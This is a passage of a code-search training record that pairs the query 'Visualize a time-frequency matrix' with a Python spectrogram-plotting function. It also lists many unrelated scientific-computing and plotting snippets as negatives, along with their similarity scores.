m, h):\n return np.random.normal(0., np.sqrt(h), (N, m))\n # return levy.rvs(0., 1e-11, (N, m))+np.random.normal(0., np.sqrt(h), (N, m)) #levy distribution\n # return cauchy.rvs(0., 1e-4, (N, m)) #Cauchy distribution", "def pixel_ts_distribution(self):\n fig,ax = plt.subplots(figsize=(8,6))\n bins = np.linspace(0,25,501)\n tsvec=self.tsmap.vec\n ax.hist(tsvec, bins, log=True, histtype='step', lw=2, cumulative=-1, label='data');\n # make array corresponding to the hist\n h = np.histogram(tsvec, bins, )[0]\n x = bins[:-1]\n yh = sum(h)-h.cumsum() \n f = lambda x: np.exp(-x/2)\n ye=6e5*f(x)\n ax.plot(x, ye, '-g', lw=2, label='exp(-TS/2)')\n ax.fill_between(x,yh,ye,where=x>5, facecolor='red', alpha=0.6)\n plt.setp(ax, xscale='linear', xlabel='TS', ylim=(1,None), ylabel='# greater than TS')\n ax.legend()\n ax.set_title('Cumulative distribution of single-pixel TS values for {}'.format(self.skymodel),\n fontsize=14)\n ax.grid(True, alpha=0.5) \n fig.set_facecolor('white')\n return fig", "def tps_rpm_bij_normals_max(x_nd, y_md, n_iter = 20, reg_init = .1, reg_final = .001, rad_init = .1, rad_final = .005, rot_reg = 1e-3, normal_coef=0.0001, \n nwsize=.15, plotting = False, plot_cb = None):\n \n _,d=x_nd.shape\n regs = loglinspace(reg_init, reg_final, n_iter)\n rads = loglinspace(rad_init, rad_final, n_iter)\n\n f = ThinPlateSpline(d)\n f.trans_g = np.median(y_md,axis=0) - np.median(x_nd,axis=0)\n \n g = ThinPlateSpline(d)\n g.trans_g = -f.trans_g\n\n\n # r_N = None\n \n for i in xrange(n_iter):\n xwarped_nd = f.transform_points(x_nd)\n ywarped_md = g.transform_points(y_md)\n \n fwddist_nm = ssd.cdist(xwarped_nd, y_md,'euclidean')\n \n invdist_nm = ssd.cdist(x_nd, ywarped_md,'euclidean')\n \n \n \n \n r = rads[i]\n prob_nm = np.exp( -(fwddist_nm + invdist_nm / (2*r)))\n corr_nm, r_N, _ = balance_matrix3(prob_nm, 10, 1e-1, 2e-1)\n corr_nm += 1e-9\n \n wt_n = corr_nm.sum(axis=1)\n wt_m = corr_nm.sum(axis=0)\n\n wt_n = np.array(wt_n, dtype='float')\n wt_m = np.array(wt_m, dtype='float')\n\n\n xtarg_nd = (corr_nm/wt_n[:,None]).dot(y_md)\n ytarg_md = (corr_nm/wt_m[None,:]).T.dot(x_nd)\n\n e_x = tps_utils.find_all_normals_naive(x_nd, nwsize, flip_away = True, project_lower_dim=(d==3))\n e_y = tps_utils.find_all_normals_naive(y_md, nwsize, flip_away = True, project_lower_dim=(d==3))\n e_xt = tps_utils.find_all_normals_naive(xtarg_nd, nwsize, flip_away = True, project_lower_dim=(d==3))\n e_yt = tps_utils.find_all_normals_naive(ytarg_md, nwsize, flip_away = True, project_lower_dim=(d==3))\n \n # if plotting and i%plotting==0 and plot_cb is not None:\n # plot_cb(x_nd, y_md, xtarg_nd, corr_nm, wt_n, f)\n \n# f = fit_ThinPlateSpline_normals(x_nd, xtarg_nd, bend_coef = regs[i], wt_n=wt_n, rot_coef = 
rot_reg, normal_coef=normal_coef, nwsize = nwsize)\n# g = fit_ThinPlateSpline_normals(y_md, ytarg_md, bend_coef = regs[i], wt_n=wt_m, rot_coef = rot_reg, normal_coef=normal_coef, nwsize = nwsize)\n f = tps_eval(x_nd, xtarg_nd, e_x, e_xt, bend_coef = regs[i], wt_n=wt_n, rot_coef = rot_reg)#, normal_coef=normal_coef, nwsize = nwsize)\n g = tps_eval(y_md, ytarg_md, e_y, e_yt, bend_coef = regs[i], wt_n=wt_m, rot_coef = rot_reg)#, normal_coef=normal_coef, nwsize = nwsize)\n\n# f._cost = tps.tps_cost(f.lin_ag, f.trans_g, f.w_ng, f.x_na, xtarg_nd, regs[i], wt_n=wt_n)/wt_n.mean()\n#f g._cost = tps.tps_cost(g.lin_ag, g.trans_g, g.w_ng, g.x_na, ytarg_md, regs[i], wt_n=wt_m)/wt_m.mean()\n return f,g", "def denoise(self):\n\n #make sure the data has a len dividible by 2^2\n self.len_swt = self.len\n while not (self.len_swt/4).is_integer():\n self.len_swt -= 1\n\n inp = self.input_nobase[:self.len_swt]\n self.wave = pywt.Wavelet(self.wave_type)\n nLevel = pywt.swt_max_level(self.len_swt)\n self.coeffs = pywt.swt(inp,self.wave,level=2)\n\n print(\" \\t Denoise STW coefficients \\t %1.2f %1.2f\" %(self.TK,self.TT))\n (cA2, cD2), (cA1, cD1) = self.coeffs\n\n # rolling kurtosis\n k2 = self._rolling_kts(cD2,self.nwin)\n k1 = self._rolling_kts(cD1,self.nwin)\n\n # thresholding\n cD2[k2<self.TK] = 0\n cD1[k1<self.TK] = 0\n\n cA2[k2<self.TK] = 0\n cA1[k1<self.TK] = 0\n\n # universal threshold\n sigma_roll_1 = mad(cD1[cD1!=0])*np.ones(self.len_swt)\n uthresh_roll_1 = self.TT * sigma_roll_1 * np.sqrt(2*np.log(self.len_swt))\n cD1[abs(cD1)<uthresh_roll_1] = 0\n\n # universal threshold\n sigma_roll_2 = mad(cD2[cD2!=0])*np.ones(self.len_swt)\n uthresh_roll_2 = self.TT * sigma_roll_2 * np.sqrt(2*np.log(self.len_swt))\n cD2[abs(cD2)<uthresh_roll_2] = 0\n\n # final threshold\n cA1[cD1 == 0] = 0\n cA2[cD2 == 0] = 0\n self.denoised_coeffs = [(cA1,cD1),(cA2,cD2)]\n\n # denoise the data\n #self.input_denoised = self._iswt(self.denoised_coeffs,self.wave)\n self.input_denoised = pywt.iswt(self.denoised_coeffs,self.wave)", "def grad(self,w):\n # Calculate the vector -sigma(-y_i * x_i.w)\n s = -np.array([sigmoid(-yi * np.dot(xi,w)) for xi,yi in zip(self.x,self.y)])\n # Multiply it by xy\n g = np.array([np.dot(xyj,s) for xyj in self.xy.transpose()])\n # Add regularisation\n g += self.alpha*w\n return g\n #g = np.array([self.grad_j(w,j) for j in xrange(len(w))])", "def test_linear_2d_simplex():\n\n\n def fx(x, dt):\n F = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]], dtype=float)\n\n return np.dot(F, x)\n\n def hx(x):\n return np.array([x[0], x[2]])\n\n\n dt = 0.1\n points = SimplexSigmaPoints(n=4)\n kf = UKF(dim_x=4, dim_z=2, dt=dt, fx=fx, hx=hx, points=points)\n\n\n kf.x = np.array([-1., 1., -1., 1])\n kf.P*=0.0001\n #kf.R *=0\n #kf.Q\n\n zs = []\n for i in range(20):\n z = np.array([i+randn()*0.1, i+randn()*0.1])\n zs.append(z)\n\n Ms, Ps = kf.batch_filter(zs)\n smooth_x, _, _ = kf.rts_smoother(Ms, Ps, dt=dt)\n\n if DO_PLOT:\n zs = np.asarray(zs)\n\n #plt.plot(zs[:,0])\n plt.plot(Ms[:,0])\n plt.plot(smooth_x[:,0], smooth_x[:,2])\n\n print(smooth_x)", "def smooth_kernel_fp(z, z_star, h, gamma=2):\n\n # compute probabilities\n p = np.exp(-(np.abs(z-z_star)/h)**gamma)\n # rescale\n p = p / np.sum(p)\n return np.squeeze(p)" ]
[ "0.64140326", "0.602416", "0.5890475", "0.5847634", "0.58306766", "0.5785613", "0.57544583", "0.57424194", "0.57397753", "0.57333004", "0.57170975", "0.5714303", "0.5707594", "0.5699608", "0.56825364", "0.5621545", "0.5603333", "0.56010664", "0.5588229", "0.5582662", "0.5576315", "0.5545373", "0.5539517", "0.5515134", "0.5511229", "0.55056465", "0.5499285", "0.54804885", "0.5462996", "0.5462898", "0.5456753", "0.54512006", "0.5450156", "0.5413868", "0.54105", "0.54040694", "0.54027236", "0.5399425", "0.5395388", "0.5382882", "0.53822047", "0.5365823", "0.5365823", "0.53646463", "0.53556216", "0.5351314", "0.5342557", "0.5336137", "0.5328472", "0.5326758", "0.5326434", "0.53175354", "0.5315796", "0.5311746", "0.53103507", "0.5309156", "0.53053385", "0.53023505", "0.5288558", "0.52870893", "0.52846044", "0.52833176", "0.52792823", "0.52702355", "0.52645737", "0.5257917", "0.5257707", "0.5257439", "0.5253719", "0.52534187", "0.5248328", "0.5245881", "0.524445", "0.5243954", "0.5235077", "0.52329636", "0.52308446", "0.5229106", "0.5225908", "0.5223699", "0.52233636", "0.5222418", "0.5222222", "0.5219845", "0.52196807", "0.5217409", "0.5211745", "0.52085656", "0.5205324", "0.5200611", "0.51998264", "0.5198484", "0.51961875", "0.51938516", "0.5183559", "0.5183515", "0.5182816", "0.51798636", "0.5179135", "0.5175856", "0.5172675" ]
0.0
-1
Visualize a time-frequency matrix.
def plot_timefrequency(z, time, f, signal=None, method="stft"):
    if method == "stft":
        figure_title = "Short-time Fourier Transform Magnitude"
        fig, ax = plt.subplots()
        for i in range(len(time)):
            ax.plot(f, z[:, i], label="Segment" + str(np.arange(len(time))[i] + 1))
        ax.legend()
        ax.set_title("Signal Spectrogram")
        ax.set_ylabel("STFT Magnitude")
        ax.set_xlabel("Frequency (Hz)")

    elif method == "cwt":
        figure_title = "Continuous Wavelet Transform Magnitude"

    elif method == "wvd":
        figure_title = "Wigner Ville Distribution Spectrogram"
        fig = plt.figure()
        plt.plot(time, signal)
        plt.xlabel("Time (sec)")
        plt.ylabel("Signal")

    elif method == "pwvd":
        figure_title = "Pseudo Wigner Ville Distribution Spectrogram"

    fig, ax = plt.subplots()
    spec = ax.pcolormesh(time, f, z, cmap=plt.get_cmap("magma"), shading="auto")
    plt.colorbar(spec)
    ax.set_title(figure_title)
    ax.set_ylabel("Frequency (Hz)")
    ax.set_xlabel("Time (sec)")
    return fig
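A small usage sketch for the plotting helper above, using a made-up time-frequency matrix. The array shapes and values are assumptions for illustration; only NumPy and matplotlib are needed besides the function itself.

import numpy as np
import matplotlib.pyplot as plt

# Hypothetical inputs: 50 frequency bins x 200 time steps with one bright ridge,
# just to exercise the pcolormesh path of the plotter above.
time = np.linspace(0, 2, 200)   # seconds
f = np.linspace(0, 25, 50)      # Hz
z = 0.1 * np.random.rand(50, 200)
z[20, :] += 1.0                 # fake spectral ridge near f[20]

fig = plot_timefrequency(z, time, f, method="pwvd")
plt.show()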
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_frequency(self):\n canvas = xboa.common.make_root_canvas(\"frequency vs time\")\n canvas.Draw()\n freq_list = [freq for freq in self.freq_list]\n hist, graph = xboa.common.make_root_graph(\"frequency vs time\",\n self.time_list, \"time [ns]\",\n freq_list, \"f [GHz]\")\n hist.Draw()\n graph.Draw(\"sameL\")\n fit = ROOT.TF1(\"fit\", \"pol4\", 0, 20*1e6)\n fit.FixParameter(0, freq_list[0])\n graph.Fit(fit)\n canvas.Update()", "def missingno_matrix(self, df, fontsize, time_freq):\n\n df.index = pd.to_datetime(df[\"timestamp\"], errors='coerce')\n df = df.resample('D').mean()\n fig, ax = plt.subplots(figsize=(17,8))\n ax = msno.matrix(df, labels=True, fontsize=fontsize, freq=time_freq, ax=ax, sparkline=True, inline=True);\n st.pyplot(fig)", "def matshow_tseries(time_series, fig=None, axis=0, xtick_n=5, time_unit=None,\r\n xlabel=None, ylabel=None):\r\n\r\n if fig is None:\r\n fig = plt.figure()\r\n\r\n if not fig.get_axes():\r\n ax = fig.add_subplot(1, 1, 1)\r\n else:\r\n ax = fig.get_axes()[axis]\r\n\r\n #Make sure that time displays on the x axis with the units you want:\r\n #If you want to change the time-unit on the visualization from that used to\r\n #represent the time-series:\r\n if time_unit is not None:\r\n tu = time_unit\r\n conv_fac = ts.time_unit_conversion[time_unit]\r\n #Otherwise, get the information from your input:\r\n else:\r\n tu = time_series.time_unit\r\n conv_fac = time_series.time._conversion_factor\r\n\r\n this_time = time_series.time / float(conv_fac)\r\n ax.matshow(time_series.data)\r\n\r\n ax.set_xticks(list(range(len(this_time)))[::len(this_time) / xtick_n])\r\n ax.set_xticklabels(this_time[::len(this_time) / xtick_n])\r\n\r\n if xlabel is None:\r\n ax.set_xlabel('Time (%s)' % tu)\r\n else:\r\n ax.set_xlabel(xlabel)\r\n\r\n if ylabel is not None:\r\n ax.set_ylabel(ylabel)\r\n\r\n return fig", "def show_matrix(matrix,kind=\"temperature\"):\n if kind==\"temperature\":\n cmap = \"bwr\"\n plt.title(\"Temperature\")\n elif kind==\"habitat\":\n cmap = \"Greens\"\n plt.title(\"Habitat\")\n else:\n cmap = \"Blues\"\n plt.imshow(matrix,\n interpolation='None',\n cmap=cmap,\n vmin=0,\n vmax=1,\n aspect=\"equal\",)\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n\n plt.xticks([])\n plt.yticks([])\n plt.colorbar(orientation=\"horizontal\", fraction=0.045)", "def plot_table(self):\r\n q = dict(sorted(decorator.arr.items(), key=lambda item: item[1]))\r\n print(\"PROGRAM | RANK | TIME ELAPSED\")\r\n count = 1\r\n for i in q:\r\n print(i[0], \"\\t\", count, \"\\t\", float(q[i]) * 1000, \"ms\")\r\n count += 1", "def plot_time_frames(self):\n\n fig = plt.figure()\n plt.grid(True)\n\n plt.ylim([-1.5,1.5])\n plt.xlim([0,1])\n\n for key in self.timeframes.keys():\n if key == 0:\n plt.plot(self.x, self.timeframes[key], label=\"time: \" + str(round(key*self.dt, 3)), linewidth=5)\n else:\n plt.plot(self.x, self.timeframes[key], label=\"time: \" + str(round(key*self.dt, 3)))\n\n plt.title(\"Wave at different times\")\n plt.legend(loc=\"upper right\")\n plt.show()\n\n # fig.savefig('results/pics_wave/vibrating_string_'+ self.type + '.png', dpi=150)", "def plotTime(self):\n plt.figure()\n t = [i for i in range(len(self.nodes_infected))]\n print(t)\n plt.title('Nodos infectados vs Tiempo')\n plt.xlabel('Instantes de tiempo')\n plt.ylabel('# de nodos infectados')\n plt.plot(t, self.nodes_infected)\n plt.grid(True)\n plt.show()", "def visualize_tma_time_series(data_path):\n\n X, y = load_tma_data(data_path)\n\n fig = plt.figure()\n ax = fig.add_subplot('111')\n\n for i in 
range(X.shape[0]):\n C = X[i, ...].reshape(X.shape[1], X.shape[2])\n l = y[i]\n ax.imshow(C, vmin=0, vmax=1)\n ax.set_title('Label : %i' % l)\n plt.pause(0.1)\n\n # labels = np.unique(y)\n # fig, axes = plt.subplots(figsize=(13, 4), ncols=4)\n # for i, l in enumerate(labels, start=0):\n # idx = np.where(y == l)[0]\n # temp = np.mean(X[idx, ...], axis=0)\n # temp[:8, :] = temp[:8, :]*6\n # pos = axes[i].imshow(temp, vmin=0, vmax=1)\n # axes[i].set_title(\"Label : %i\" % l)\n # fig.colorbar(pos, ax=axes[i])\n # plt.show()", "def visualizations():\r\n raise NotImplementedError\r\n # df = pandas.read_csv('accidents_by_hour.csv', index_col=0, header=0)\r\n # plt.plot(0, 0, data=df)\r\n # plt.show()\r", "def plot(self, inline=True, fname=None, show_colorbar=False):\n color_norm = matplotlib.colors.Normalize(\n vmin=self.decibel_limits[0], vmax=self.decibel_limits[1]\n )\n\n plt.imshow(self.spectrogram[::-1], cmap=\"Greys\", norm=color_norm)\n\n # pick values to show on time and frequency axes\n yvals = self.frequencies.round(-2).astype(int)\n xvals = self.times.round(2)\n y_idx = [int(ti) for ti in np.linspace(0, len(yvals), 8)]\n y_idx[-1] -= 1\n plt.yticks(len(yvals) - np.array(y_idx), yvals[y_idx])\n x_idx = [int(ti) for ti in np.linspace(0, len(xvals), 6)]\n x_idx[-1] -= 1\n plt.xticks(x_idx, xvals[x_idx])\n\n # add axes labels\n plt.ylabel(\"frequency (Hz): mel scale\")\n plt.xlabel(\"time (sec)\")\n\n if show_colorbar:\n plt.colorbar()\n\n # if fname is not None, save to file path fname\n if fname:\n plt.savefig(fname)\n\n # if not saving to file, check if a matplotlib backend is available\n if inline:\n if os.environ.get(\"MPLBACKEND\") is None:\n warnings.warn(\"MPLBACKEND is 'None' in os.environ. Skipping plot.\")\n else:\n plt.show()", "def plot_freq_spec(data, title):\n plt.title(title)\n\n def plot_freq_spec(axis, line, label):\n n = len(axis)\n fft = fftpack.fft(axis) / n\n fft = fft[range(int(n / 2))]\n plt.plot(range(int(n / 2)), abs(fft), line, label=label)\n plot_freq_spec(data[:, 0], 'r-', label='x')\n plot_freq_spec(data[:, 1], 'g-', label='y')\n plot_freq_spec(data[:, 2], 'b-', label='z')", "def show_MAP_frequencies(self, figure_name):\n if not self.get('MAP_done'): return\n\n modes = self.get('modes') \n obs_freq = np.array([mode.freq for mode in modes]) # unit: per day\n d_freq = obs_freq[1:] - obs_freq[:-1]\n\n # MAP_names = self.get('feature_names')\n # MAP_features = self.get('MAP_feature')\n MAP_freq = self.get('MAP_frequencies')\n\n fig, ax = plt.subplots(1, figsize=(4,3), tight_layout=True)\n\n for k, freq in enumerate(obs_freq):\n ax.axvline(x=freq, ymin=0, ymax=1, linestyle='solid', color='r', lw=2)\n ax.axvline(x=MAP_freq[k], ymin=0, ymax=0.8, linestyle='dashed', color='k', lw=1)\n\n # Axis cosmetics\n ax.set_ylim(0, 1.2)\n ax.set_yticklabels(())\n ax.set_xlabel(r'Frequency (per day)')\n # Legend\n ax.plot([], [], linestyle='solid', lw=4, color='r', label='Observed')\n ax.plot([], [], linestyle='dashed', lw=2, color='k', label='Model')\n leg = ax.legend(loc=1)\n\n plt.savefig(figure_name)\n logger.info('show_MAP_frequencies: saved {0}'.format(figure_name))\n plt.close()", "def FourierPlot(tas):\n detrend = signal.detrend(tas)\n L = len(tas)\n freqs = np.fft.fftfreq(L)\n tas_fft = np.fft.fft(detrend)\n R = tas_fft.real\n Im = tas_fft.imag\n mag = np.sqrt(R**2+Im**2)\n plt.plot(1/freqs,mag)", "def plot_observed(self):\n \n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1)\n for k in self.observed_data.keys():\n plt.plot(self.observed_data[k][0], 
self.observed_data[k][1], 'bx')\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n\n fig = plt.figure(figsize=(16,4))\n \n # Plot of time vs X\n plt.subplot(1,3,2)\n for k in self.observed_data.keys(): \n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][0], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n\n # Plot of time vs Y\n plt.subplot(1,3,3)\n for k in self.observed_data.keys():\n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][1], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n plt.show();", "def plot(self, inline=True, fname=None, show_colorbar=False):\n norm = matplotlib.colors.Normalize(\n vmin=self.decibel_limits[0], vmax=self.decibel_limits[1]\n )\n plt.pcolormesh(\n self.times,\n self.frequencies,\n self.spectrogram,\n shading=\"auto\",\n cmap=\"Greys\",\n norm=norm,\n )\n\n plt.xlabel(\"time (sec)\")\n plt.ylabel(\"frequency (Hz)\")\n if show_colorbar:\n plt.colorbar()\n\n # if fname is not None, save to file path fname\n if fname:\n plt.savefig(fname)\n\n # if not saving to file, check if a matplotlib backend is available\n if inline:\n if os.environ.get(\"MPLBACKEND\") is None:\n warnings.warn(\"MPLBACKEND is 'None' in os.environ. Skipping plot.\")\n else:\n plt.show()", "def plot_matrix(self, matrix: np.ndarray):\n sns.heatmap(matrix, annot=True)\n plt.show()", "def visualize(self):\n self.dataFrame.hist()\n plt.show()", "def plot_spectrum(self, energy_array: np.ndarray) -> None:\n spectrum, bins = np.histogram(\n energy_array,\n range=(0, 400),\n bins=3000)\n plt.plot(bins[:-1], spectrum)\n plt.xlabel(\"Energy (keV)\")\n plt.ylabel(\"Counts\")", "def plot_spectrum(wavetable: np.ndarray) -> None:\n ps = np.abs(np.fft.fft(wavetable)) ** 2\n\n time_step = 1 / 44100\n freqs = np.fft.fftfreq(wavetable.size, time_step)\n idx = np.argsort(freqs)\n\n plt.plot(freqs[idx], ps[idx])\n plt.show()", "def plottf(tfarray,tlst,flst,fignum=1,starttime=0,timeinc='hrs',\r\n dt=1.0,title=None,vmm=None,cmap=None,aspect=None,interpolation=None,\r\n cbori=None,cbshrink=None,cbaspect=None,cbpad=None,scale='log',\r\n normalize='n',):\r\n \r\n #time increment\r\n if timeinc=='hrs':\r\n tinc=3600/dt\r\n elif timeinc=='min':\r\n tinc=60/dt\r\n elif timeinc=='sec':\r\n tinc=1/dt\r\n else:\r\n raise ValueError(timeinc+'is not defined')\r\n #colormap\r\n if cmap==None:\r\n cmap='jet'\r\n else:\r\n cmap=cmap\r\n #aspect ratio\r\n if aspect==None:\r\n aspect='auto'\r\n else:\r\n aspect=aspect\r\n #interpolation\r\n if interpolation==None:\r\n interpolation='gaussian'\r\n else:\r\n interpolation=interpolation\r\n #colorbar orientation\r\n if cbori==None:\r\n cbori='vertical'\r\n else:\r\n cbori=cbori\r\n #colorbar shinkage\r\n if cbshrink==None:\r\n cbshrink=.99\r\n else:\r\n cbshrink=cbshrink\r\n #colorbar aspect\r\n if cbaspect==None:\r\n cbaspect=20\r\n else:\r\n cbaspect=cbaspect\r\n #colorbar pad\r\n if cbpad==None:\r\n cbpad=.1\r\n else:\r\n cbpad=cbpad\r\n #scale\r\n if scale=='log':\r\n zerofind=np.where(abs(tfarray)==0)\r\n tfarray[zerofind]=1.0\r\n if normalize=='y':\r\n plottfarray=10*np.log10(abs(tfarray/np.max(abs(tfarray))))\r\n else:\r\n plottfarray=10*np.log10(abs(tfarray))\r\n elif scale=='linear':\r\n if normalize=='y':\r\n plottfarray=abs(tfarray/np.max(abs(tfarray)))\r\n else:\r\n plottfarray=abs(tfarray)\r\n \r\n plt.rcParams['font.size']=10\r\n plt.rcParams['figure.subplot.left']=.08\r\n 
plt.rcParams['figure.subplot.right']=.99\r\n plt.rcParams['figure.subplot.bottom']=.07\r\n plt.rcParams['figure.subplot.top']=.96\r\n plt.rcParams['figure.subplot.wspace']=.25\r\n plt.rcParams['figure.subplot.hspace']=.20\r\n \r\n \r\n plt.figure(fignum)\r\n if vmm!=None:\r\n vmin=vmm[0]\r\n vmax=vmm[1]\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc+starttime,\r\n tlst[-1]/tinc+starttime,flst[0],flst[-1]),aspect=aspect,\r\n vmin=vmin,vmax=vmax,cmap=cmap,interpolation=interpolation)\r\n else:\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc+starttime,\r\n tlst[-1]/tinc+starttime,flst[0],flst[-1]),aspect=aspect,\r\n cmap=cmap,interpolation=interpolation)\r\n plt.xlabel('Time('+timeinc+')',fontsize=12,fontweight='bold')\r\n plt.ylabel('Frequency (Hz)',fontsize=12,fontweight='bold')\r\n if title!=None:\r\n plt.title(title,fontsize=14,fontweight='bold')\r\n plt.colorbar(orientation=cbori,shrink=cbshrink,pad=cbpad,aspect=cbaspect)\r\n plt.show()", "def display(array):\n plt.figure()\n plt.imshow(array)\n plt.show()", "def plotAll(fx,tfarray,tlst,flst,fignum=1,starttime=0,timeinc='hrs',\r\n dt=1.0,title=None,vmm=None,cmap=None,aspect=None,interpolation=None,\r\n cbori=None,cbshrink=None,cbaspect=None,cbpad=None,normalize='n',\r\n scale='log'):\r\n \r\n #time increment\r\n if timeinc=='hrs':\r\n tinc=3600/dt\r\n elif timeinc=='min':\r\n tinc=60/dt\r\n elif timeinc=='sec':\r\n tinc=1/dt\r\n else:\r\n raise ValueError(timeinc+'is not defined')\r\n #colormap\r\n if cmap==None:\r\n cmap='jet'\r\n else:\r\n cmap=cmap\r\n #aspect ratio\r\n if aspect==None:\r\n aspect='auto'\r\n else:\r\n aspect=aspect\r\n #interpolation\r\n if interpolation==None:\r\n interpolation='gaussian'\r\n else:\r\n interpolation=interpolation\r\n #colorbar orientation\r\n if cbori==None:\r\n cbori='vertical'\r\n else:\r\n cbori=cbori\r\n #colorbar shinkage\r\n if cbshrink==None:\r\n cbshrink=.99\r\n else:\r\n cbshrink=cbshrink\r\n #colorbar aspect\r\n if cbaspect==None:\r\n cbaspect=20\r\n else:\r\n cbaspect=cbaspect\r\n #colorbar pad\r\n if cbpad==None:\r\n cbpad=.1\r\n else:\r\n cbpad=cbpad\r\n \r\n #scale\r\n if scale=='log':\r\n zerofind=np.where(abs(tfarray)==0)\r\n tfarray[zerofind]=1.0\r\n if normalize=='y':\r\n plottfarray=20*np.log10(abs(tfarray/np.max(abs(tfarray))))\r\n else:\r\n plottfarray=20*np.log10(abs(tfarray))\r\n elif scale=='linear':\r\n if normalize=='y':\r\n plottfarray=abs(plottfarray/np.max(abs(plottfarray)))**2\r\n else:\r\n plottfarray=abs(tfarray)**2\r\n \r\n t=np.arange(len(fx))*dt+starttime*dt\r\n FX=np.fft.fft(padzeros(fx))\r\n FXfreq=np.fft.fftfreq(len(FX),dt)\r\n \r\n #set some plot parameters\r\n plt.rcParams['font.size']=10\r\n plt.rcParams['figure.subplot.left']=.13\r\n plt.rcParams['figure.subplot.right']=.98\r\n plt.rcParams['figure.subplot.bottom']=.07\r\n plt.rcParams['figure.subplot.top']=.96\r\n plt.rcParams['figure.subplot.wspace']=.25\r\n plt.rcParams['figure.subplot.hspace']=.20\r\n #plt.rcParams['font.family']='helvetica'\r\n \r\n fig=plt.figure(fignum)\r\n \r\n #plot FFT of fx\r\n fax=fig.add_axes([.05,.25,.1,.7])\r\n plt.plot(abs(FX[0:len(FX)/2]/max(abs(FX)))**2,FXfreq[0:len(FX)/2],'-k')\r\n plt.xlim(0,1)\r\n plt.ylim(0,FXfreq[len(FX)/2-1])\r\n fax.xaxis.set_major_locator(MultipleLocator(.5))\r\n \r\n #plot TFD\r\n pax=fig.add_axes([.25,.25,.75,.7])\r\n if vmm!=None:\r\n vmin=vmm[0]\r\n vmax=vmm[1]\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc,tlst[-1]/tinc,\r\n flst[0],flst[-1]),aspect=aspect,vmin=vmin,vmax=vmax,cmap=cmap,\r\n interpolation=interpolation)\r\n else:\r\n 
plt.imshow(plottfarray,extent=(tlst[0]/tinc,tlst[-1]/tinc,\r\n flst[0],flst[-1]),aspect=aspect,cmap=cmap,\r\n interpolation=interpolation)\r\n plt.xlabel('Time('+timeinc+')',fontsize=12,fontweight='bold')\r\n plt.ylabel('Frequency (Hz)',fontsize=12,fontweight='bold')\r\n if title!=None:\r\n plt.title(title,fontsize=14,fontweight='bold')\r\n plt.colorbar(orientation=cbori,shrink=cbshrink,pad=cbpad,aspect=cbaspect)\r\n \r\n #plot timeseries\r\n tax=fig.add_axes([.25,.05,.60,.1])\r\n plt.plot(t,fx,'-k')\r\n plt.axis('tight')\r\n plt.show()", "def _display_tsne(self):\n self._tsne_window.clear()\n self._tsne_window.plot(self._Y_tsne[:,0], self._Y_tsne[:,1], 'b.')", "def plot_time_slices(self):\n U = self.r.u[:, 15:-15, :]\n T = range(U.shape[2])\n kwarglist = [dict(t=t,\n index=self.index,\n U=U,\n levels=self.levels,\n fname=self.time_slice_path(t))\n for t in T]\n util.parallel_process(plot_time_slice, kwarglist=kwarglist)", "def show_waveform(self, peaks=[]):\n if peaks is None:\n peaks = []\n data = self.amplitude\n x_axis = range(0, len(data))\n x_axis = [x / self.fs for x in x_axis]\n plt.plot(x_axis, data)\n plt.axhline(self.height)\n for p in peaks:\n plt.axvline(p / self.fs, color=\"red\", alpha=0.2)\n plt.ylabel(\"Amplitude\")\n plt.xlabel(\"Time (seconds)\")\n plt.title(\"Waveform\")\n plt.show()", "def plot_table(timestamps: dict, threadList: list, mList: list) -> None:\n plt.plot(threadList, timestamps.values(), 'o-')\n plt.legend(mList, title = 'Total valores', loc='best', bbox_to_anchor=(0.5, 0., 0.5, 0.5))\n plt.xlabel('Número de processos')\n plt.ylabel('Tempo de Execução (s)')\n plt.title('Tempo de Execução por Total de Processos e Valores')\n plt.show()", "def fft_viz(image: np.ndarray, shift: bool = True) -> None:\n plt.imshow(img_fft(image, shift=shift), cmap='gray')", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. Bit)')\n ax1.set_xlabel('Time (s)')", "def plot(self):\n\t\tself.plotOfSpect()", "def display_fft(self, N=4096):\n if len(self.series) % N != 0:\n return\n\n h = self.series[-N:]\n H = fft(h)\n\n # the squared magnitude of the fft is an estimate of the\n # power spectral density\n\n # http://documents.wolfram.com/applications/timeseries/\n # UsersGuidetoTimeSeries/1.8.3.html\n # http://en.wikipedia.org/wiki/Power_spectral_density\n freq = range(N / 2 + 1)\n sdf = [Hn * Hn.conjugate() for Hn in H]\n sdf = [sdf[f].real for f in freq]\n loglog(freq, sdf)\n xlabel(\"frequency\")\n ylabel(\"power\")\n show()", "def show(self):\n plt.close() # Remove any existing plot\n plt.imshow(\n self.data,\n extent=[\n self.c - self.radius,\n self.c + self.radius,\n self.r + self.radius,\n self.r - self.radius,\n ],\n )\n plt.colorbar()\n plt.title(self.time.strftime(\"%Y%m%d %H:%M:%S.%f %Z\"))\n plt.show()", "def plot_times(self, train_time, title=None, xmin=None, xmax=None,\n ymin=None, ymax=None, ax=None, show=True, color=None,\n xlabel=True, ylabel=True, legend=True, chance=True,\n label='Classif. score'):\n if not np.array(train_time).dtype is np.dtype('float'):\n raise ValueError('train_time must be float | list or array of '\n 'floats. Got %s.' 
